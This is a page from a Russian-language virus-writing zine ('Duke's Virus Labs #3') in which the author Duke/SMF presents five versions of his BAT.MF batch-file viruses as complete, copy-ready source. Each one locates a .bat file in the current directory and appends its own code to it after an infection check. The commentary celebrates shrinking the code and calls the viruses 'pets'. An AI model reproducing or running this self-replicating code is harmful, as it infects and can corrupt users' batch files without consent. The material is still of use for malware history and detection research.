- [Duke's Virus Labs #3] - [Page 03] -

BAT-вирусы - гонка продолжается !
(c) by Duke/SMF


   Время идет - BAT-вирусы мельчают... Представляю вашему вниманию новую
порцию вирусов из семейства BAT.SMF (или, как обозвал их Касперский,
BAT.MF ;). На этот раз я уделял больше внимания не качеству, а их
размерам, которые постепенно стремятся к нулю :)) Поэтому этим вирусам
свойственны ошибки:
   Во-первых, они поражают только один файл в текущем каталоге, а именно -
последний найденный при поиске. С другой стороны это плюс, поскольку
большой 8^) эпидемии они не вызовут. По прежнему действует проверка
на зараженность.
   Во-вторых, они выводят на экран посторонние надписи, а именно имена
файлов, которые они перебирают перед заражением.
   Можете проследить за эволюцией моих питомцев :))

--------------------------------------------
BAT.MF.166 (v3.4 beta)
Не содержит версии вируса.
===== Cut here =====
 %$&%
@echo off %$&%
for %%b in (*.bat) do set $&=%%b
if "%$&%=="autoexec.bat goto $&
find "$&"<%$&%>nul
if errorlevel 1 find "$&"<%0>>%$&%
:$& [$MF,Duke/SMF]
===== Cut here =====
--------------------------------------------
BAT.MF.155 (v3.4)
===== Cut here =====
 %$&%
@echo off%$&%
if "%0==" goto $&
for %%b in (*.bat) do set $&=%%b
find "$&"<%$&%>nul
if errorlevel 1 find "$&"<%0>>%$&%
:$& [$MF 3.4,Duke/SMF]
===== Cut here =====
--------------------------------------------
BAT.MF.137 (v3.5)
===== Cut here =====
 %$&%
@if "%0==" exit %$&MF 3.5 Duke/SMF%
@for %%b in (*.bat) do set $&=%%b
@find "$&"<%$&%>nul
@if errorlevel 1 find "$&"<%0>>%$&%
===== Cut here =====
--------------------------------------------
BAT.MF.120 (v3.6)
Не содержит версии вируса. Идентификатор заменен на "MF", поэтому 
вирус не будет заражать BAT-файлы, написанные группой SMF, в том 
числе и вирусы :) Если в жертве в конце файла нет перевода строки, 
то файл будет подпорчен :(
===== Cut here =====
@if "%0=="%Duke/SMF% exit
@for %%b in (*.bat) do set MF=%%b
@find "MF"<%MF%>nul
@if errorlevel 1 find "MF"<%0>>%MF%
===== Cut here =====
--------------------------------------------
BAT.MF.121 (v3.7)
Переделка вируса BAT.MF.120, где вместо заражения файла %MF% поражается 
файл %$% , что полностью эквивалентно в контексте вируса.
===== Cut here =====
@if "%0=="%Duke/SMF% exit
@for %%b in (%MF%*.bat) do set $=%%b
@find "MF"<%$%>nul
@if errorlevel 1 find "MF"<%0>>%$%
===== Cut here =====
--------------------------------------------
